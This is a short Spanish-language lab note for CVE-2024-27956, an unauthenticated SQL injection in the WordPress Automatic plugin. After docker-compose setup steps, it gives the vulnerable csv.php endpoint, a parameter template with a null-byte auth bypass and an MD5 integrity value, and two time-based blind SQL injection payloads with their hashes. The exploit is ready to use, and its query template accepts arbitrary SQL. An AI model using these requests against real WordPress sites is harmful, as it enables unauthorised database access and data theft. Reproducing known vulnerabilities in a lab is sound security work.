
CVE-2024-27956 WordPress Automatic < 3.92.1 - Inyección SQL no autenticada
Nota
Construye wordpress: docker-compose -f stack.yml up
Instala el plugin:
Panel de WordPress, elige Plugins > Añadir nuevo
Haz clic en Subir plugin



Exploit
<HOST>/wp-content/plugins/wp-automatic/inc/csv.php
q={{query}}&auth=%00&integ={{md5query}}
q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f

q=SELECT+IF(1=2,sleep(5),sleep(0))&auth=%00&integ=4b1f4024af81df56c3b00679b9b52183
